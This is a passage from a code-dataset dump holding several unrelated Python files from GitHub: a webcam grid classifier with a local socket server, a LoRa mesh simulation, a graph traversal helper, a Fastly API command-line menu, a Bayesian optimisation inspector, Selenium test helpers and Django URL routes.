cx, cy = center\n return \",\".join(map(str, (*pic[cy, cx], *pic[cy - d, cx], *pic[cy + d, cx], *pic[cy, cx - d], *pic[cy, cx + d])))\n\n\ndef get_shape_data(pic_gray, start_point):\n sx, sy = start_point\n return \",\".join(map(str, pic_gray[sy + 1:sy + SLOT_DIM - 1, sx + 1:sx + SLOT_DIM - 1].flatten()))\n\n\ndef get_color_data_list(pic, center, d):\n cx, cy = center\n return np.array([*pic[cy, cx], *pic[cy - d, cx], *pic[cy + d, cx], *pic[cy, cx - d], *pic[cy, cx + d]]).astype(\n \"uint8\")\n\n\ndef get_shape_data_list(pic_gray, start_point):\n sx, sy = start_point\n return np.array(((pic_gray[sy + 1:sy + SLOT_DIM - 1, sx + 1:sx + SLOT_DIM - 1] + 1) % 256).flatten()).astype(\n \"uint8\")\n\n\nRESIZE_DIM = 240\nTOPLEFT, BOTRIGHT = [126, 29], [520, 427]\nSLOT_DIM = RESIZE_DIM // 6\npos_index = 0\nn_slot = 1\nlabel = 0\n\nl = []\nfor i in range(10):\n try:\n ret, frame = cv2.VideoCapture(i).read()\n if not ret:\n continue\n l += [i]\n except:\n continue\n\nprint(l)\n\ncap = cv2.VideoCapture(int(input(\"Cam index: \")))\nf_w, f_h = cap.get(3), cap.get(4)\n\ncenter_list = get_center_list(RESIZE_DIM, RESIZE_DIM, 6, 6)\nstart_point_list = get_start_point_list(RESIZE_DIM, RESIZE_DIM, 6, 6)\n\n# print(center_list)\n\n\nHOST = \"localhost\"\nPORT = 10000\nprint(HOST)\n\nserver = CustomSocket(HOST, PORT)\nserver.startServer()\n\nwhile True:\n # Wait for connection from client :}\n conn, addr = server.sock.accept()\n print(\"Client connected from\", addr)\n\n while cap.isOpened():\n\n try:\n\n data = np.frombuffer(server.recvMsg(conn), dtype=np.uint8)[0]\n print(data)\n\n ret, frame = cap.read()\n frame_bgr = cv2.resize(frame[TOPLEFT[1]: BOTRIGHT[1], TOPLEFT[0]:BOTRIGHT[0]], (RESIZE_DIM, RESIZE_DIM))\n frame_show = np.copy(frame_bgr)\n frame_gray = cv2.cvtColor(frame_show, cv2.COLOR_BGR2GRAY)\n\n for i in range(RESIZE_DIM):\n for j in range(RESIZE_DIM):\n b, g, r = map(int, frame_show[i, j])\n # print((b+g+r/3))\n m = (b + g + r) / 3\n\n if m > 100 and ((b - m) ** 2 + (g - m) ** 2 + (r - m) ** 2) < 400:\n frame_gray[i, j] = 255\n # print(\"yes\")\n else:\n frame_gray[i, j] = 0\n\n if not ret:\n print(\"Error\")\n continue\n\n draw_grid(frame_show, 6, 6, (0, 0, 0), 1)\n\n for n in range(n_slot):\n draw_points(frame_show, center_list[(pos_index + n) % 36], 6, (0, 0, 0))\n\n frame_show = cv2.resize(frame_show, (480, 480))\n cv2.imshow(\"frame\", frame_show)\n\n # sx, sy = center_list[pos_index]\n # cv2.imshow(\"frameg\", frame_gray)\n # cv2.imshow(\"id_frame\", frame_gray[sy + 1:sy + SLOT_DIM - 1, sx + 1:sx + SLOT_DIM - 1])\n\n key = cv2.waitKey(1)\n\n # color_l = get_color_data_list(frame_bgr, center_list[pos_index], 6)\n all_color_list = []\n for cen in center_list:\n all_color_list += [get_color_data_list(frame_bgr, cen, 6)]\n # print(all_color_list)\n color_res = np.argmax(wtf_color_model.predict(np.array(all_color_list), verbose=0), axis=1)\n print(color_res)\n\n all_shape_list = []\n for stp in start_point_list:\n all_shape_list += [get_shape_data_list(frame_gray, stp)]\n\n shape_res = np.argmax(wtf_shape_model.predict(np.array(all_shape_list), verbose=0), axis=1)\n print(shape_res)\n\n if data == 1:\n server.sendMsg(conn, json.dumps({\"c\": list(map(int, color_res))}))\n if data == 0:\n server.sendMsg(conn, json.dumps({\"s\": list(map(int, shape_res))}))\n\n\n if key == ord('q'):\n cap.release()\n elif key == ord('n'):\n pos_index = (pos_index + 1) % 36\n\n\n\n except Exception as e:\n traceback.print_exc()\n print(e)\n print(\"Connection Closed\")\n break\n\n cv2.destroyAllWindows()\n","repo_name":"GemsLoveNLP/BB-C","sub_path":"cammain.py","file_name":"cammain.py","file_ext":"py","file_size_in_byte":5673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"277906537","text":"def max_wait(id):\n return int(0.5*id*(id+5))+id\n # return id**2+id\ndef upper_limit_map(count):\n return int((count*(count+1)*(count+8))/6)\n\nclass Lora:\n def __init__(self,name:str,id:int,connections:list,data_rate:int,SD_rate:int,internet=False,total_nodes=1):\n self.name=name\n self.id=id\n connections.sort(key = lambda connections: connections[1])\n self.connections = connections\n self.data_rate=data_rate\n self.SD_rate = SD_rate\n self.incomming=[]\n self.outgoing=[]\n self.time_count=0\n self.state=\"\"\n self.wait=0\n self.looking_at = []\n self.turns=[]\n self.internet=internet\n self.conductor=False\n self.upstream=[]\n self.downstream=[]\n self.distance_from_internet=125\n if self.internet: self.distance_from_internet = 0\n self.total_nodes=total_nodes\n\n def tick(self,count=1):\n if len(self.incomming)>0:\n if 0 in self.incomming:\n index=self.incomming.index(0)\n self.looking_at=self.incomming[0:index]\n self.incomming=self.incomming[index+1:]\n if self.looking_at[0]==128:\n if self.id in self.looking_at[2:]:\n index=self.looking_at[2:].index(self.id)\n if not self.looking_at[-1] in self.upstream:\n self.upstream.append(self.looking_at[-1])\n else:\n if self.state==\"\" or self.state == \"map_wait\":\n self.distance_from_internet = min(len(self.looking_at[2:]),self.distance_from_internet)\n for node in self.looking_at[2:]:\n if not node in self.downstream:\n self.downstream.append(node)\n self.state=\"map_wait\"\n self.wait=max_wait(self.id)\n\n if self.state==\"map_wait\":\n if self.wait>1:\n self.wait-=1\n return\n if self.wait==1:\n self.outgoing=self.looking_at[:2]+self.downstream+[self.id]+[0]\n self.state=\"map_done\"\n self.wait=0\n else:\n self.state=\"\"\n self.wait=0\n\n if self.state == \"\":\n if self.internet:\n self.state = \"map_done\"\n self.outgoing=[128,self.total_nodes,1,0]\n self.id=1\n def show_view(self):\n print(self.name,\" upstream\",self.upstream,\" downstream\",self.downstream, \"dist\",self.distance_from_internet)\n \n\n\nclass Network:\n def __init__(self,nodes):\n self.map={}\n for node in nodes:\n self.map[node.name]=node\n \n def resolve(self):\n for node in self.map:\n for target, db in self.map[node].connections:\n if len(self.map[target].outgoing)>0:\n # print(\"adding\",target,\"to\",node)\n self.map[node].incomming.append(self.map[target].outgoing[0])\n break\n for node in self.map:\n if len(self.map[node].outgoing)>0:\n self.map[node].outgoing.pop(0)\n def tick(self,count=1):\n for i in range(count):\n for node in self.map:\n self.map[node].tick()\n print(mesh)\n self.resolve()\n \n def __repr__(self):\n temp=''\n for node in self.map:\n temp+= str(node)+\" ^\"+str(self.map[node].outgoing)+\" v\"+str(self.map[node].incomming)+\" w\"+str(self.map[node].wait)+\" s \"+str(self.map[node].state)+\"\\n\"\n\n return temp\n def show_view(self):\n for node in self.map:\n self.map[node].show_view()\n\n\n# TEST CASES\n\n\n# nodea=Lora(\"1\",1,[[\"2\",-20],],0,0,True,6)\n# nodeb=Lora(\"2\",2,[[\"1\",-20],[\"3\",-40],[\"4\",-40]],0,0,False)\n# nodec=Lora(\"3\",3,[[\"2\",-40],[\"5\",-30],[\"6\",-40]],0,0,False)\n# noded=Lora(\"4\",4,[[\"2\",-40],[\"5\",-40]],0,0,False)\n# nodee=Lora(\"5\",5,[[\"3\",-40],[\"4\",-30]],0,0,False)\n# nodef=Lora(\"6\",6,[[\"3\",-40]],0,0,False)\n\n# mesh=Network([nodea,nodeb,nodec,noded,nodee,nodef])\n\nnodea=Lora(\"1\",1,[[\"4\",-20],],0,0,True,6)\nnodeb=Lora(\"2\",2,[[\"4\",-20],[\"5\",-40]],0,0,False)\nnodec=Lora(\"3\",3,[[\"4\",-40],[\"5\",-30]],0,0,False)\nnoded=Lora(\"4\",4,[[\"6\",-40],[\"3\",-40],[\"2\",-40],[\"1\",-40]],0,0,False)\nnodee=Lora(\"5\",5,[[\"2\",-40],[\"3\",-30]],0,0,False)\nnodef=Lora(\"6\",6,[[\"4\",-40]],0,0,False)\n\nmesh=Network([nodea,nodeb,nodec,noded,nodee,nodef])\n\nprint(mesh)\nmesh.tick(10)\n\nmesh.tick(17)\nmesh.show_view()\nmesh.tick(20)\nmesh.show_view()\nmesh.tick(upper_limit_map(6))\nmesh.show_view()\n\n\n\n","repo_name":"supamee/sandbox","sub_path":"lora/lora.py","file_name":"lora.py","file_ext":"py","file_size_in_byte":4681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"42221147754","text":"import logging\nfrom typing import Generator\n\nimport networkx as nx\n\n\ndef dept_first_search(graph: nx.Graph, node=None) -> Generator:\n if node is None:\n try:\n node = list(graph.nodes[0])\n except Exception as e:\n logging.warning('empty graph in dept_first_search')\n logging.warning(e)\n return []\n stack = []\n visited = [node]\n stack.append(node)\n while stack:\n neighbors = graph.neighbors(stack[-1])\n new_neighbors = [n for n in neighbors if neighbors not in visited]\n stack += new_neighbors\n visited += new_neighbors\n yield stack.pop()\n","repo_name":"AdamMartinCote/algosandbox","sub_path":"algosandbox/graphtraversal/graphtraversal.py","file_name":"graphtraversal.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"72645121920","text":"from os import system, name\nfrom xml.dom import minidom\nimport scripts\nimport requests\nimport pandas\nfrom pandas.io.json import json_normalize\nimport pprint\n\nclass DataFrameFromDict(object):\n def __init__(self, data):\n self.df = json_normalize(data)\n self.columns = list(self.df.columns.values) \n def __enter__(self):\n return self.df \n def __exit__(self, exc_type, exc_val, exc_tb):\n self.df.drop([c for c in self.columns], axis=1, inplace=True)\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n# define our clear screen function \ndef clear(): \n # for windows \n if name == 'nt': \n _ = system('cls') \n # for mac and linux(here, os.name is 'posix') \n else: \n _ = system('clear') \n\ndef getKeyFromConfig():\n configXML = minidom.parse('Config.xml')\n items = configXML.getElementsByTagName('item')\n return str(items[0].childNodes[0].data)\n\ndef mainMenu():\n while True:\n scripts.clear()\n #Display menu options \n print(' ' + scripts.bcolors.BOLD + scripts.bcolors.UNDERLINE + scripts.bcolors.HEADER + 'MAIN MENU' + \\\n scripts.bcolors.ENDC + scripts.bcolors.ENDC + scripts.bcolors.ENDC)\n print(scripts.bcolors.HEADER + '===========' + scripts.bcolors.ENDC)\n print('1: WAF')\n print('2: CDN')\n print('3: List Services')\n print('4: Check API Key')\n print('5: Generate API Key')\n print('6: List API Keys')\n print('0: Revoke API Key')\n print('Q to quit')\n print(scripts.bcolors.HEADER + '===========' + scripts.bcolors.ENDC)\n print(' ')\n choice = input('Option: ').strip(' ') #get user's choice\n\n if choice == '1':\n scripts.clear()\n scripts.WAFMenu()\n elif choice == '2':\n scripts.clear()\n scripts.CDNMenu()\n elif choice == '3':\n scripts.clear()\n scripts.listServices()\n elif choice == '4':\n scripts.clear()\n scripts.checkAPI()\n elif choice == '5':\n scripts.clear()\n scripts.generateKey() \n elif choice == '6':\n scripts.clear()\n scripts.getAllTokens()\n elif choice == '0':\n scripts.clear()\n scripts.revokeKey()\n elif choice == 'Q' or choice == 'q':\n exit()\n else:\n input('Not a valid choice. Hit enter to continue...')\n\ndef getServicesObj():\n if scripts.checkAPINoPrint():\n print(\"This may take a while. Enumerating services...\")\n header={\"Accept\":\"application/json\"}\n header.update({\"Fastly-Key\":scripts.getKeyFromConfig()})\n r=requests.get(\"https://api.fastly.com/service\",headers=header)\n if r.status_code == 401:\n input(scripts.bcolors.WARNING + \"Error with services request.\\nStatus: \" + str(r.status_code) + \"\\nPress ENTER to continue...\" + scripts.bcolors.ENDC)\n elif r.status_code == 200:\n services = r.json()\n with DataFrameFromDict(services) as df:\n df['ID'] = df['id']\n df['Name'] = df['name']\n df['Version'] = df['version']\n df.insert(3, 'Domain(s)', None)\n # print(df)\n for x in range(len(df.index)):\n if not df['Version'].isnull().iloc[x]:\n id = str(df['ID'].iloc[x])\n # print(\"https://api.fastly.com/service/\" + id + \"/domain\")\n r2=requests.get(\"https://api.fastly.com/service/\" + id + \"/domain\",headers=header)\n # pprint.pprint(r2.json())\n returns=json_normalize(r2.json())\n if r2.json():\n returnlist = returns['name'].tolist()\n df.at[x,'Domain(s)'] = \", \".join(returnlist)\n return df\n else:\n input(scripts.bcolors.WARNING + \"Error with services request.\\nStatus: \" + str(r.status_code) + \"\\nPress ENTER to continue...\" + scripts.bcolors.ENDC)\n else:\n input(scripts.bcolors.WARNING + \"Error with API Key, generate a new one. Press ENTER to continue...\" + scripts.bcolors.ENDC)\n\ndef getDetails(df):\n pandas.set_option('display.max_colwidth', -1)\n print(scripts.bcolors.OKBLUE + scripts.bcolors.UNDERLINE + \"FASTLY SERVICES\" + scripts.bcolors.ENDC + scripts.bcolors.ENDC)\n print(df)\n try:\n inVar = int(input(\"\\n\\nEnter index of service to view details: \"))\n print(str(df['Name'].iloc[inVar]))\n print(str(df['ID'].iloc[inVar]))\n except:\n e = input(\"Not a valid number. Press enter to continue or E to exit...\")\n if e.strip(' ').lower() == 'e':\n clear()\n mainMenu()\n clear()\n getDetails(df)\n header={\"Accept\":\"application/json\"}\n header.update({\"Fastly-Key\":scripts.getKeyFromConfig()})\n r=requests.get(\"https://api.fastly.com/service/\" + str(df['ID'].iloc[inVar]) + \"/details\",headers=header)\n if r.status_code == 401:\n input(scripts.bcolors.WARNING + \"Error with services request.\\nStatus: \" + str(r.status_code) + \"\\nPress ENTER to continue...\" + scripts.bcolors.ENDC)\n elif r.status_code == 200:\n services = r.json()\n # pprint.pprint(services['versions'])\n print(\"Active/Deployed Version: \" + str(services['active_version']['number']))\n with DataFrameFromDict(services['versions']) as df2:\n df2['Version'] = df2['number']\n df2['Created On'] = df2['created_at']\n df2['Updated On'] = df2['updated_at']\n df2['Locked'] = df2['locked']\n df2['Staging'] = df2['staging']\n df2['Testing'] = df2['testing']\n df2['Comment'] = df2['comment']\n print(df2.to_string(index=False))\n while \"Not a valid response.\":\n reply = str(input(\"View another service [Y/n]: \")).lower().strip()\n if reply == 'y':\n clear()\n getDetails(df)\n if reply == 'n':\n mainMenu()\n\ndef listServices():\n df = getServicesObj()\n getDetails(df)\n\ndef listServicesNoPrint():\n if scripts.checkAPINoPrint():\n print(\"This may take a while. Enumerating services...\")\n header={\"Accept\":\"application/json\"}\n header.update({\"Fastly-Key\":scripts.getKeyFromConfig()})\n r=requests.get(\"https://api.fastly.com/service\",headers=header)\n if r.status_code == 401:\n input(scripts.bcolors.WARNING + \"Error with services request.\\nStatus: \" + str(r.status_code) + \"\\nPress ENTER to continue...\" + scripts.bcolors.ENDC)\n elif r.status_code == 200:\n services = r.json()\n with DataFrameFromDict(services) as df:\n df['ID'] = df['id']\n df['Name'] = df['name']\n df['Version'] = df['version']\n df.insert(3, 'Domain(s)', None)\n # print(df)\n for x in range(len(df.index)):\n if not df['Version'].isnull().iloc[x]:\n id = str(df['ID'].iloc[x])\n # print(\"https://api.fastly.com/service/\" + id + \"/domain\")\n r2=requests.get(\"https://api.fastly.com/service/\" + id + \"/domain\",headers=header)\n # pprint.pprint(r2.json())\n returns=json_normalize(r2.json())\n if r2.json():\n returnlist = returns['name'].tolist()\n df.at[x,'Domain(s)'] =\", \".join(returnlist)\n pandas.set_option('display.max_colwidth', -1)\n return df\n else:\n input(scripts.bcolors.WARNING + \"Error with services request.\\nStatus: \" + str(r.status_code) + \"\\nPress ENTER to continue...\" + scripts.bcolors.ENDC)\n else:\n input(scripts.bcolors.WARNING + \"Error with API Key, generate a new one. Press ENTER to continue...\" + scripts.bcolors.ENDC)","repo_name":"hummelm10/FastlyPythonAPI","sub_path":"FastlyPythonCLI/scripts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8058,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"97"} +{"seq_id":"32105028928","text":"#from __future__ import annotations\n# Libs\nfrom copy import deepcopy\nimport numpy as np\nimport h5py\nimport dill as pickle\n\n# Internal\nfrom bayesian_optimization.utils.utils import get_grid_points_multidimensional_and_grid\nfrom bayesian_optimization.estimators import estimator\n\n# Type hints\nfrom typing import *\nfrom typing import NoReturn\n\nif TYPE_CHECKING:\n from bayesian_optimization.context.context import Context\n from bayesian_optimization.estimators import estimator\n from configobj import ConfigObj\n\n\nclass Inspector:\n \"\"\"Class used to store data from various processes. Main goal is to store temporary results as well as\n inspection data which then can be used to verify the processes.\n However this all can also be used to store further meta data such as time spent for certain calculations.\n \"\"\"\n\n def __init__(\n self,\n lower_bounds: np.array,\n upper_bounds: np.array,\n n_test_points: int,\n inspector_path: str = None,\n do_estimate_test_data: bool = False,\n do_inspect_estimation: bool = False,\n do_inspect_optimization: bool = False,\n do_inspect_nn_model_fit: bool = False,\n do_inspect_acq: bool = False,\n store_estimators: bool = False,\n ):\n \"\"\"constructor\n :param lower_bounds: lower bound for each dimension constraining space where to sample inspection data from\n :param upper_bounds: upper bound for each dimension constraining space where to sample inspection data from\n :param n_test_points: number of inspection points (per dimension)\n :param do_estimate_test_data: apply the estimation to the test data to get mu; sigma for inspection points.\n :param do_inspect_estimation: get inspection data for estimation\n :param do_inspect_optimization: get inspection data for optimization\n :param do_inspect_nn_model_fit: get inspection data for model fit\n \"\"\"\n self.lower_bounds: np.array = lower_bounds\n self.upper_bounds: np.array = upper_bounds\n self.n_test_points: int = n_test_points\n self.inspector_path = inspector_path\n test_points, grid = get_grid_points_multidimensional_and_grid(self.lower_bounds, self.upper_bounds, self.n_test_points)\n self.test_x: np.array = test_points\n self.test_grid: np.array = grid\n self.test_y: Union[np.array, None] = None\n self.context: Union[Context, None] = None\n # Estimator\n self.estimate_test_data: bool = do_estimate_test_data\n self.inspect_estimation: bool = do_inspect_estimation\n self.store_estimators: bool = store_estimators\n self.estimators: np.array = []\n self.estimations: np.array = []\n self.estimations_on_test_data: np.array = []\n # ACQ Optimizer\n self.inspect_optimization: bool = do_inspect_optimization\n self.optimizations: np.array = []\n self.optimization_on_test_data: np.array = []\n # NNModel\n self.inspect_nn_model: bool = do_inspect_nn_model_fit\n self.fits: np.array = []\n # ACQ Func.\n self.inspect_acq: bool = do_inspect_acq\n self.acqs: np.array = []\n self.data_dump_dict = {}\n\n def reset_dump(self) -> NoReturn:\n \"\"\"resets the dict which is used to flexibly store intermediate results\n :return:\n \"\"\"\n self.data_dump_dict = {}\n\n def dump_data(self, key: str, data) -> NoReturn:\n \"\"\"store the gicen data under the given key into one big dict.\n :param key: key for the dict\n :param data: data to store at under the key\n :return:\n \"\"\"\n self.data_dump_dict[key] = data\n\n def save_dump_as_h5(self, path, filename):\n h5f = h5py.File(\"{}/{}.h5\".format(path, filename), 'w')\n for key in self.data_dump_dict:\n h5f.create_dataset(key, data=self.data_dump_dict[key])\n h5f.close()\n\n def save_dump_as_pickle(self, path, filename):\n file_to_write = open(\"{}/{}.pickle\".format(path, filename), \"wb\")\n pickle.dump(self.data_dump_dict, file_to_write)\n file_to_write.close()\n\n def set_context(self, context) -> NoReturn:\n \"\"\"Set the context to the Inspector to allow access from both sides\n :param context: context\n \"\"\"\n self.context = context\n self.test_y = self.context.callback(self.test_x)\n\n def set_inspector_path(self, path: str) -> NoReturn:\n self.inspector_path = path\n\n def get_json(self):\n json_dict = {}\n keys = [\"lower_bounds\", \"upper_bounds\", \"n_test_points\", \"test_x\", \"test_y\", \"estimate_test_data\",\n \"inspect_estimation\", \"estimations\", \"estimations_on_test_data\", \"inspect_optimization\",\n \"optimizations\", \"optimization_on_test_data\"]\n for k in keys:\n json_dict[k] = eval(getattr(self, k))\n return json_dict\n\n def add_estimation(self, estimation: dict) -> NoReturn:\n \"\"\"Store Inspector data of one estimation of a estimator for the 'live' data the estimation is applied on\n :param estimation: dictionary containing information to be stored\n \"\"\"\n self.estimations.append(estimation)\n\n def add_estimation_test_data(self, estimation: dict) -> NoReturn:\n \"\"\"Store Inspector data of one estimation of a estimator for the test data specified in the Inspector\n :param estimation: dictionary containing information to be stored\n \"\"\"\n self.estimations_on_test_data.append(estimation)\n\n # def reset_estimations(self):\n # self.estimations = []\n\n def add_optimization(self, optimization: dict) -> NoReturn:\n \"\"\"Store Inspector data of one optimization of a Optimizer for the the 'live' data the optimization\n is applied on.\n :param optimization: dictionary containing information to be stored\n \"\"\"\n if len(self.optimizations)-1 >= self.context.bo_step:\n self.optimizations[self.context.bo_step] = optimization\n else:\n self.optimizations.append(optimization)\n\n def replace_last_optimization(self, optimization: dict) -> NoReturn:\n \"\"\"Store Inspector data of one optimization of a Optimizer for the the 'live' data the optimization\n is applied on.\n :param optimization: dictionary containing information to be stored\n \"\"\"\n self.optimizations.append(optimization)\n\n def add_fit(self, fit: dict) -> NoReturn:\n \"\"\"Store Inspector data of one Keras model fit.\n :param fit: dictionary containing information to be stored\n \"\"\"\n self.fits.append(fit)\n\n def add_acq_evaluation(self, acq_evaluation: dict) -> NoReturn:\n \"\"\"Store Inspector data of a acquisition function evaluation.\n :param acq_evaluation: dictionary containing information to be stored\n \"\"\"\n if len(self.acqs)-1 >= self.context.bo_step:\n self.acqs[self.context.bo_step] = acq_evaluation\n else:\n self.acqs.append(acq_evaluation)\n\n def replace_last_acq_evaluation(self, acq_evaluation: dict) -> NoReturn:\n \"\"\"Store Inspector data of a acquisition function evaluation.\n :param acq_evaluation: dictionary containing information to be stored\n \"\"\"\n self.acqs.pop()\n self.acqs.append(acq_evaluation)\n\n def add_estimator(self, estimator: estimator):\n self.estimators.append(deepcopy(estimator))\n\n @classmethod\n def read_inspector(cls, config: 'ConfigObj') -> 'Inspector':\n \"\"\"reads the configuration from the config file and creates the inspector accordingly.\n :param config: config parser instance\n :return: inspector instance\n \"\"\"\n lower_bounds = [float(i) for i in config[\"Inspector\"].as_list(\"lower_bound\")]\n upper_bounds = [float(i) for i in config[\"Inspector\"].as_list(\"upper_bound\")]\n\n return cls(\n lower_bounds=lower_bounds,\n upper_bounds=upper_bounds,\n n_test_points=config[\"Inspector\"].as_int(\"n_test_points\"),\n do_estimate_test_data=config[\"Inspector\"].as_bool(\"do_estimate_test_data\"),\n do_inspect_estimation=config[\"Inspector\"].as_bool(\"do_inspect_estimation\"),\n do_inspect_optimization=config[\"Inspector\"].as_bool(\"do_inspect_optimization\"),\n do_inspect_acq=config[\"Inspector\"].as_bool(\"do_inspect_acq\"),\n store_estimators=config[\"Inspector\"].as_bool(\"store_estimators\"),\n )\n\n\n","repo_name":"marketdesignresearch/NOMU","sub_path":"bayesian_optimization/bayesian_optimization/context/inspector.py","file_name":"inspector.py","file_ext":"py","file_size_in_byte":8523,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"97"} +{"seq_id":"5511333851","text":"from selenium.webdriver.common.by import By\nfrom model.group import Group\n\n\nclass GroupHelper:\n\n def __init__(self, app):\n self.app = app\n\n def create(self, group): # создаем новую группу, заполняем поля, сохраняем\n driver = self.app.driver\n self.open_groups_page()\n driver.find_element(By.CSS_SELECTOR, \"[name = \"\"new\"\"]\").click()\n self.fill_group_form(group)\n driver.find_element(By.NAME, \"submit\").click()\n self.return_to_group_page()\n self.group_cache = None\n\n def count(self): # считаем количество групп в списке\n driver = self.app.driver\n self.open_groups_page()\n return len(driver.find_elements_by_name(\"selected[]\"))\n\n def change_field_value(self, field_name, text): # заполняем поля группы, только если они не пустые\n driver = self.app.driver\n if text is not None:\n driver.find_element(By.NAME, field_name).click()\n driver.find_element(By.NAME, field_name).clear()\n driver.find_element(By.NAME, field_name).send_keys(text)\n\n def delete_group_by_index(self, index): # удаляем рандомную группу\n driver = self.app.driver\n self.open_groups_page()\n self.select_group_by_index(index)\n driver.find_element_by_name(\"delete\").click()\n self.return_to_group_page()\n self.group_cache = None\n\n def delete_first_group(self): # удаляем первую по счету группу\n self.delete_group_by_index(0)\n\n def fill_group_form(self, group): # заполняем поля группы\n self.change_field_value(\"group_name\", group.name)\n self.change_field_value(\"group_header\", group.header)\n self.change_field_value(\"group_footer\", group.footer)\n\n group_cache = None\n\n def get_group_list(self): # получаем список групп\n if self.group_cache is None:\n driver = self.app.driver\n self.open_groups_page()\n self.group_cache = []\n for element in driver.find_elements_by_css_selector(\"span.group\"):\n text = element.text\n id = element.find_element_by_name(\"selected[]\").get_attribute(\"value\")\n self.group_cache.append(Group(name=text,id=id))\n return list(self.group_cache)\n\n def modify_first_group(self, new_group_data): # редактируем первую по счету группу\n self.modify_group_by_index(0)\n\n def modify_group_by_index(self, index, new_group_data): # редактируем рандомную группу\n driver = self.app.driver\n self.open_groups_page()\n self.select_group_by_index(index)\n driver.find_element(By.NAME, \"edit\").click()\n self.fill_group_form(new_group_data)\n driver.find_element(By.NAME, \"update\").click()\n self.return_to_group_page()\n self.group_cache = None\n\n def open_groups_page(self): # переходим на страницу \"groups\"\n driver = self.app.driver\n if not (driver.current_url.endswith(\"/group.php\") and len(driver.find_elements(By.CSS_SELECTOR, \"[name = \"\"new\"\"]\"))>0 ):\n driver.find_element(By.LINK_TEXT, \"groups\").click()\n\n def return_to_group_page(self): # возвращаемся на страницу \"groups\"\n driver = self.app.driver\n driver.find_element(By.LINK_TEXT, \"group page\").click()\n\n def select_first_group(self): # находим и выбираем первую в списке группу\n driver = self.app.driver\n driver.find_element_by_name(\"selected[]\").click()\n\n def select_group_by_index(self, index): # находим и выбираем группу по индексу\n driver = self.app.driver\n driver.find_elements_by_name(\"selected[]\")[index].click()\n","repo_name":"sckobeleva/Barancev_python_for_testers","sub_path":"fixture/group.py","file_name":"group.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"31045281907","text":"from django.urls import path\n\nfrom .views import ColumnListCreateView, ColumnRetrieveUpdateDestroyAPIView, TaskListCreateView, \\\n TaskRetrieveUpdateDestroyAPIView\n\napp_name = 'tasks'\nurlpatterns = [\n path('column/',\n ColumnListCreateView.as_view(),\n name='column-list'),\n path('column//',\n ColumnRetrieveUpdateDestroyAPIView.as_view(),\n name='column-detail'),\n path('column//task/',\n TaskListCreateView.as_view(),\n name='task-list'),\n path('column//task//',\n TaskRetrieveUpdateDestroyAPIView.as_view(),\n name='task-detail'),\n]\n","repo_name":"roman-wsu/task-management-api","sub_path":"apps/tasks/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"20900073260","text":"#! /usr/bin/python\nimport re,sys,os\nimport json\nimport itertools\nimport loggerRecord,globalS\nfrom time import gmtime, strftime, localtime\nlogger = loggerRecord.get_logger()\n\nclass generic():\n ''' this class will have generic methods common to linux,neo4J,wowgic etc. Creating a seperate class so that in case\n of future requirement this can be imported and readily used'''\n\n ############################################################################\n #Function Name : parseIpfromOutput #\n #Input : string #\n #Return Value : IP's list #\n ############################################################################\n def parseIpfromOutput(self,buf):\n ''' this functions picks out the IP's from buffer string and returns in\n the form of list'''\n\n ipArr = re.findall(\"\\d+.\\d+.\\d+.\\d+\",buf)\n logger.debug(\"IPs are %s\",ipArr)\n return ipArr\n\n ############################################################################\n #Function Name : dumpclean #\n #Input : dict variable #\n #Return Value : none #\n ############################################################################\n def dumpclean(obj):\n ''' so far this copied function is not used but placing it for future\n representation of python dictionaries'''\n\n logger.debug('Python Dictionary Printing start')\n if type(obj) == dict:\n for k, v in obj.items():\n if hasattr(v, '__iter__'):\n logger.debug('%s',k)\n dumpclean(v)\n else:\n logger.debug('%s : %s', (k, v))\n elif type(obj) == list:\n for v in obj:\n if hasattr(v, '__iter__'):\n dumpclean(v)\n else:\n logger.debug('%s', v)\n else:\n logger.debug('%s', obj)\n logger.debug('Python Dictionary Printing END')\n\n ############################################################################\n #Function Name : dictDumper #\n #Input : #\n #Return Value : #\n ############################################################################\n def dictDumper(self,obj, nested_level=0, output=sys.stdout):\n ''' recursive function for internal debugging purpose\n source:online'''\n spacing = ' '\n if type(obj) == dict:\n print >> output, '%s{' % ((nested_level) * spacing)\n for k, v in obj.items():\n if hasattr(v, '__iter__'):\n print >> output, '%s%s:' % ((nested_level + 1) * spacing, k)\n self.dictDumper(v, nested_level + 1, output)\n else:\n print >> output, '%s%s: %s' % ((nested_level + 1) * spacing, k, v)\n print >> output, '%s}' % (nested_level * spacing)\n elif type(obj) == list:\n print >> output, '%s[' % ((nested_level) * spacing)\n for v in obj:\n if hasattr(v, '__iter__'):\n self.dictDumper(v, nested_level + 1, output)\n else:\n print >> output, '%s%s' % ((nested_level + 1) * spacing, v)\n print >> output, '%s]' % ((nested_level) * spacing)\n else:\n print >> output, '%s%s' % (nested_level * spacing, obj)\n\n ############################################################################\n #Function Name : dateTimeFields #\n #Input : none #\n #Return Value : str contains local date & time #\n ############################################################################\n def dateTimeFields(self):\n ''' the way how I need the current timestamp which is to be used for file\n names and across all the log files as well'''\n\n return strftime(\"%Y%m%d_%H%M%S\", localtime())\n\n\n ############################################################################\n #Function Name : connCheck #\n #Input : ipAddress-> ip address of the machine #\n #Return Value : 1 0n failure 0 on success #\n ############################################################################\n def connCheck(self,ipAddress):\n ''' issue ping command and check the reachability of the machine. So that\n basic health checkup is administrated before doing ssh'''\n\n response = os.system(\"ping -c 1 -w 10 \" + ipAddress)\n #and then check the response...\n if response == 0:\n logger.info('hostname# %s is up!',ipAddress)\n return 0\n logger.error('hostname# %s is 